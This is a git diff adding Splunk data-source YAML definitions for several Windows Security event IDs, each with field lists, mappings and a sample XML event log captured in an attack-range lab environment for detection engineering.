+- RecordNumber
+- Source_Workstation
+- Status
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- Workstation
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src
+- src_nt_domain
+- src_nt_host
+- src_user
+- status
+- subject
+- ta_windows_action
+- ta_windows_security_CategoryString
+- ta_windows_status
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4794</EventID><Version>0</Version><Level>0</Level><Task>13824</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2022-08-23T04:24:05.064689300Z'/><EventRecordID>821077</EventRecordID><Correlation
+  ActivityID='{4EC0CCF2-B67B-0004-F8CC-C04E7BB6D801}'/><Execution ProcessID='612'
+  ThreadID='4120'/><Channel>Security</Channel><Computer>win-dc-root-17044-552.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='SubjectUserSid'>ATTACKRANGE\Administrator</Data><Data Name='SubjectUserName'>Administrator</Data><Data
+  Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x959c5</Data><Data
+  Name='Workstation'>[fe80::b907:7694:d740:91bb]</Data><Data Name='Status'>0x0</Data></EventData></Event>
diff --git a/data_sources/windows_event_log_security_4798.yml b/data_sources/windows_event_log_security_4798.yml
new file mode 100644
index 0000000000..d488917f96
--- /dev/null
+++ b/data_sources/windows_event_log_security_4798.yml
@@ -0,0 +1,99 @@
+name: Windows Event Log Security 4798
+id: 29e97f72-eb2e-400e-b0c9-81277547e43b
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4798
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- ActivityID
+- CallerProcessId
+- CallerProcessName
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetSid
+- TargetUserName
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- product
+- punct
+- session_id
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4798</EventID><Version>0</Version><Level>0</Level><Task>13824</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2024-02-02T00:12:21.404799400Z'/><EventRecordID>386860</EventRecordID><Correlation
+  ActivityID='{A0011278-554F-0000-8212-01A04F55DA01}'/><Execution ProcessID='584'
+  ThreadID='5616'/><Channel>Security</Channel><Computer>ar-win-2.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='TargetUserName'>Guest</Data><Data Name='TargetDomainName'>AR-WIN-2</Data><Data
+  Name='TargetSid'>AR-WIN-2\Guest</Data><Data Name='SubjectUserSid'>AR-WIN-2\Administrator</Data><Data
+  Name='SubjectUserName'>Administrator</Data><Data Name='SubjectDomainName'>AR-WIN-2</Data><Data
+  Name='SubjectLogonId'>0x2f4df4</Data><Data Name='CallerProcessId'>0x1590</Data><Data
+  Name='CallerProcessName'>C:\Windows\ImmersiveControlPanel\telegram\telegram.exe</Data></EventData></Event>
diff --git a/data_sources/windows_event_log_security_4876.yml b/data_sources/windows_event_log_security_4876.yml
new file mode 100644
index 0000000000..8c3fc3750b
--- /dev/null
+++ b/data_sources/windows_event_log_security_4876.yml
@@ -0,0 +1,91 @@
+name: Windows Event Log Security 4876
+id: 4a78722a-9cd9-44e8-b010-dffad5c7f170
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4876
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- ActivityID
+- BackupType
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4876</EventID><Version>0</Version><Level>0</Level><Task>12805</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2023-02-06T16:27:05.403719800Z'/><EventRecordID>15379961</EventRecordID><Correlation
+  ActivityID='{E37FFFB9-381B-0002-BFFF-7FE31B38D901}'/><Execution ProcessID='652'
+  ThreadID='692'/><Channel>Security</Channel><Computer>win-dc-mhaag-attack-range-84.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='BackupType'>1</Data><Data Name='SubjectUserSid'>S-1-5-21-2690122726-1172718210-436210976-500</Data><Data
+  Name='SubjectUserName'>administrator</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data
+  Name='SubjectLogonId'>0xeb075</Data></EventData></Event>
diff --git a/data_sources/windows_event_log_security_4886.yml b/data_sources/windows_event_log_security_4886.yml
new file mode 100644
index 0000000000..6ea033bbef
--- /dev/null
+++ b/data_sources/windows_event_log_security_4886.yml
@@ -0,0 +1,82 @@
+name: Windows Event Log Security 4886
+id: c5abd97d-b468-451f-bd65-b4f97efa4ecc
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4886
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- ActivityID
+- Attributes
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- RequestId
+- Requester
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4886</EventID><Version>0</Version><Level>0</Level><Task>12805</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2023-02-06T13:13:36.529622400Z'/><EventRecordID>15379925</EventRecordID><Correlation
+  ActivityID='{E37FFFB9-381B-0002-BFFF-7FE31B38D901}'/><Execution ProcessID='652'
+  ThreadID='368'/><Channel>Security</Channel><Computer>win-dc-mhaag-attack-range-84.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='RequestId'>7</Data><Data Name='Requester'>ATTACKRANGE\administrator</Data><Data
+  Name='Attributes'>
diff --git a/data_sources/windows_event_log_security_4887.yml b/data_sources/windows_event_log_security_4887.yml
new file mode 100644
index 0000000000..f01243b726
--- /dev/null
+++ b/data_sources/windows_event_log_security_4887.yml
@@ -0,0 +1,85 @@
+name: Windows Event Log Security 4887
+id: 994c7b19-a623-4231-9818-f00e453b9a75
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4887
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- ActivityID
+- Attributes
+- Channel
+- Computer
+- Disposition
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- RequestId
+- Requester
+- Subject
+- SubjectKeyIdentifier
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4887</EventID><Version>0</Version><Level>0</Level><Task>12805</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2023-06-09T14:54:02.171703300Z'/><EventRecordID>1830974609</EventRecordID><Correlation
+  ActivityID='{28AAD79F-81AB-0001-BED7-AA28AB81D901}'/><Execution ProcessID='668'
+  ThreadID='3160'/><Channel>Security</Channel><Computer>cert_authority.attack_range.local</Computer><Security/></System><EventData><Data
+  Name='RequestId'>7</Data><Data Name='Requester'>attack_range\attack_user</Data><Data
+  Name='Attributes'>CertificateTemplate:VulnerableTemplate_ESC1
diff --git a/data_sources/windows_event_log_security_5136.yml b/data_sources/windows_event_log_security_5136.yml
new file mode 100644
index 0000000000..4fd9d9ce60
--- /dev/null
+++ b/data_sources/windows_event_log_security_5136.yml
@@ -0,0 +1,105 @@
+name: Windows Event Log Security 5136
+id: 7ba3737e-231e-455d-824e-cd077749f835
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 5136
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- ActivityID
+- AppCorrelationID
+- AttributeLDAPDisplayName
+- AttributeSyntaxOID
+- AttributeValue
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- DSName
+- DSType
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- ObjectClass
+- ObjectDN
+- ObjectGUID
+- OpCorrelationID
+- Opcode
+- OperationType
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>5136</EventID><Version>0</Version><Level>0</Level><Task>14081</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2022-11-17T20:51:01.321860300Z'/><EventRecordID>1997365</EventRecordID><Correlation
+  ActivityID='{F8EE8E31-F924-0000-3E8E-EEF824F9D801}'/><Execution ProcessID='652'
+  ThreadID='5112'/><Channel>Security</Channel><Computer>win-dc-mvelazco-02713-392.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='OpCorrelationID'>{73C96723-504B-4F15-830A-F4DDB1C48F2E}</Data><Data Name='AppCorrelationID'>-</Data><Data
+  Name='SubjectUserSid'>ATTACKRANGE\Administrator</Data><Data Name='SubjectUserName'>Administrator</Data><Data
+  Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x95675</Data><Data
+  Name='DSName'>attackrange.local</Data><Data Name='DSType'>%%14676</Data><Data Name='ObjectDN'>CN=DANNIE_CERVANTES,OU=ServiceAccounts,OU=OGC,OU=Stage,DC=attackrange,DC=local</Data><Data
+  Name='ObjectGUID'>{15AFB68A-679C-4F5B-AC18-4D988B3B3E44}</Data><Data Name='ObjectClass'>user</Data><Data
+  Name='AttributeLDAPDisplayName'>servicePrincipalName</Data><Data Name='AttributeSyntaxOID'>2.5.5.12</Data><Data
+  Name='AttributeValue'>adm/srv1.attackrange.local</Data><Data Name='OperationType'>%%14674</Data></EventData></Event>
diff --git a/data_sources/windows_event_log_security_5137.yml b/data_sources/windows_event_log_security_5137.yml
new file mode 100644
index 0000000000..57b73d835c
--- /dev/null
+++ b/data_sources/windows_event_log_security_5137.yml
@@ -0,0 +1,97 @@
+name: Windows Event Log Security 5137
+id: 64ed7bb1-9c3c-4355-ac08-b506ec3b053e
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 5137
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- AppCorrelationID
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- DSName
+- DSType
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- ObjectClass
+- ObjectDN
+- ObjectGUID
+- OpCorrelationID
+- Opcode
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/><EventID>5137</EventID><Version>0</Version><Level>0</Level><Task>14081</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2023-03-27T20:59:21.097880600Z'/><EventRecordID>170140</EventRecordID><Correlation/><Execution
+  ProcessID='612' ThreadID='736'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='OpCorrelationID'>{681cac8c-b5a4-48fd-be93-4339996bd94d}</Data><Data Name='AppCorrelationID'>-</Data><Data
+  Name='SubjectUserSid'>ATTACKRANGE\Administrator</Data><Data Name='SubjectUserName'>Administrator</Data><Data
+  Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x8561a</Data><Data
+  Name='DSName'>attackrange.local</Data><Data Name='DSType'>%%14676</Data><Data Name='ObjectDN'>CN={2C4C7CD3-7AA5-4E84-89B5-CE9FC75611D4},CN=Policies,CN=System,DC=attackrange,DC=local</Data><Data
+  Name='ObjectGUID'>{3e7ae4de-29a6-41c1-b27c-bf9548b0444c}</Data><Data Name='ObjectClass'>groupPolicyContainer</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5140.yml b/data_sources/windows_event_log_security_5140.yml
similarity index 51%
rename from data_sources/endpoint/event_sources/Windows_Event_Log_Security_5140.yml
rename to data_sources/windows_event_log_security_5140.yml
index a9ab242fe4..d0b23360d3 100644
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5140.yml
+++ b/data_sources/windows_event_log_security_5140.yml
@@ -1,4 +1,16 @@
-event_name: Windows Event Log Security 5140
+name: Windows Event Log Security 5140
+id: 93e0ca09-e4b8-4da6-872a-d0127c4d2b22
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 5140
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
 fields:
 - _time
 - AccessList
@@ -94,4 +106,12 @@ field_mappings:
       SubjectUserName: actor.user.name
       SubjectLogonId: actor.session.uid
       SubjectUserSid: actor.user.uid
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/><EventID>5140</EventID><Version>1</Version><Level>0</Level><Task>12808</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2023-03-23T15:59:26.669364000Z'/><EventRecordID>138541</EventRecordID><Correlation/><Execution ProcessID='4' ThreadID='3792'/><Channel>Security</Channel><Computer>ar-win-66.attackrange.local</Computer><Security/></System><EventData><Data Name='SubjectUserSid'>ATTACKRANGE\ELMER_SALAS</Data><Data Name='SubjectUserName'>ELMER_SALAS</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x2f259b</Data><Data Name='ObjectType'>File</Data><Data Name='IpAddress'>10.0.1.16</Data><Data Name='IpPort'>49864</Data><Data Name='ShareName'>\\*\IPC$</Data><Data Name='ShareLocalPath'></Data><Data Name='AccessMask'>0x1</Data><Data Name='AccessList'>%%4416
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/><EventID>5140</EventID><Version>1</Version><Level>0</Level><Task>12808</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2023-03-23T15:59:26.669364000Z'/><EventRecordID>138541</EventRecordID><Correlation/><Execution
+  ProcessID='4' ThreadID='3792'/><Channel>Security</Channel><Computer>ar-win-66.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='SubjectUserSid'>ATTACKRANGE\ELMER_SALAS</Data><Data Name='SubjectUserName'>ELMER_SALAS</Data><Data
+  Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x2f259b</Data><Data
+  Name='ObjectType'>File</Data><Data Name='IpAddress'>10.0.1.16</Data><Data Name='IpPort'>49864</Data><Data
+  Name='ShareName'>\\*\IPC$</Data><Data Name='ShareLocalPath'></Data><Data Name='AccessMask'>0x1</Data><Data
+  Name='AccessList'>%%4416
diff --git a/data_sources/windows_event_log_security_5141.yml b/data_sources/windows_event_log_security_5141.yml
new file mode 100644
index 0000000000..09f144cdb4
--- /dev/null
+++ b/data_sources/windows_event_log_security_5141.yml
@@ -0,0 +1,101 @@
+name: Windows Event Log Security 5141
+id: eafb35fa-f034-4be3-8508-d9173a73c0a1
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 5141
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- ActivityID
+- AppCorrelationID
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- DSName
+- DSType
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Logon_ID
+- Name
+- ObjectClass
+- ObjectDN
+- ObjectGUID
+- OpCorrelationID
+- Opcode
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- TreeDelete
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>5141</EventID><Version>0</Version><Le>0</Level><Task>14081</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2022-10-17T21:08:49.470503100Z'/><EventRecordID>670908</EventRecordID><Correlation
+  ActivityID='{5FD5D64A-DD82-0004-52D6-D55F82DDD801}'/><Execution ProcessID='648'
+  ThreadID='3328'/><Channel>Security</Channel><Computer>win-dc-range-02713-392.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='OpCorrelationID'>{A3058236-A662-445E-9BEB-DE9210B143AB}</Data><Data Name='AppCorrelationID'>-</Data><Data
+  Name='SubjectUserSid'>ATTACKRANGE\Administrator</Data><Data Name='SubjectUserName'>Administrator</Data><Data
+  Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x978ac22</Data><Data
+  Name='DSName'>attackrange.local</Data><Data Name='DSType'>%%14676</Data><Data Name='ObjectDN'>CN=NTDS
+  Settings,CN=WIN-HOST-ROGUE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=attackrange,DC=local</Data><Data
+  Name='ObjectGUID'>{48387E55-8777-403F-BC63-2A38289A6BBF}</Data><Data Name='ObjectClass'>nTDSDSA</Data><Data
+  Name='TreeDelete'>%%14679</Data></EventData></Event>
diff --git a/data_sources/windows_event_log_security_5145.yml b/data_sources/windows_event_log_security_5145.yml
new file mode 100644
index 0000000000..39fdae2cff
--- /dev/null
+++ b/data_sources/windows_event_log_security_5145.yml
@@ -0,0 +1,138 @@
+name: Windows Event Log Security 5145
+id: 0746479b-7b82-4d7e-8811-0b35da00f798
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 5145
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- AccessList
+- AccessMask
+- AccessReason
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- IpAddress
+- IpPort
+- Keywords
+- Level
+- Logon_ID
+- Name
+- ObjectType
+- Opcode
+- ProcessID
+- RecordNumber
+- RelativeTargetName
+- ShareLocalPath
+- ShareName
+- Source_Port
+- Source_Workstation
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- file_name
+- file_path
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_nt_domain
+- src_nt_host
+- src_port
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+field_mappings:
+  - data_model: custom_cim
+    data_set: Endpoint.Processes
+    mapping:
+      AccessList: access_list
+      AccessMask: access_mask
+      AccessReason: access_result
+      RelativeTargetName: relative_target_name
+      ObjectType: object_type
+      IpAddress: src_ip
+      IpPort: src_port
+      SubjectDomainName: user_domain
+      SubjectUserName: user
+      SubjectLogonId: user_logon_id
+      SubjectUserSid: user_sid
+      ShareName: share
+  - data_model: ocsf
+    mapping:
+      AccessList: access_list
+      AccessMask: access_mask
+      AccessReason: access_result
+      RelativeTargetName: file.path
+      ObjectType: file.type
+      IpAddress: src_endpoint.ip
+      IpPort: src_endpoint.port
+      SubjectDomainName: actor.user.domain
+      SubjectUserName: actor.user.name
+      SubjectLogonId: actor.session.uid
+      SubjectUserSid: actor.user.uid
+      ShareName: share
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>5145</EventID><Version>0</Version><Level>0</Level><Task>12811</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated
+  SystemTime='2024-03-11T03:06:39.742608600Z'/><EventRecordID>2018939</EventRecordID><Correlation/><Execution
+  ProcessID='4' ThreadID='304'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='SubjectUserSid'>ANONYMOUS LOGON</Data><Data Name='SubjectUserName'>ANONYMOUS
+  LOGON</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x13ef1b</Data><Data
+  Name='ObjectType'>File</Data><Data Name='IpAddress'>10.0.1.15</Data><Data Name='IpPort'>50160</Data><Data
+  Name='ShareName'>\\*\SYSVOL</Data><Data Name='ShareLocalPath'>\??\C:\Windows\SYSVOL\sysvol</Data><Data
+  Name='RelativeTargetName'>lsarpc</Data><Data Name='AccessMask'>0x120089</Data><Data
+  Name='AccessList'>%%1538
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_System_4720.yml b/data_sources/windows_event_log_system_4720.yml
similarity index 77%
rename from data_sources/endpoint/event_sources/Windows_Event_Log_System_4720.yml
rename to data_sources/windows_event_log_system_4720.yml
index 2389b1a75d..1464d969e3 100644
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_System_4720.yml
+++ b/data_sources/windows_event_log_system_4720.yml
@@ -1,4 +1,16 @@
-event_name: Windows Event Log System 4720
+name: Windows Event Log System 4720
+id: f01d4758-05c8-4ac4-a9a5-33500dd5eb6c
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log System 4720
+source: XmlWinEventLog:System
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
 fields:
 - _time
 - Account_Domain
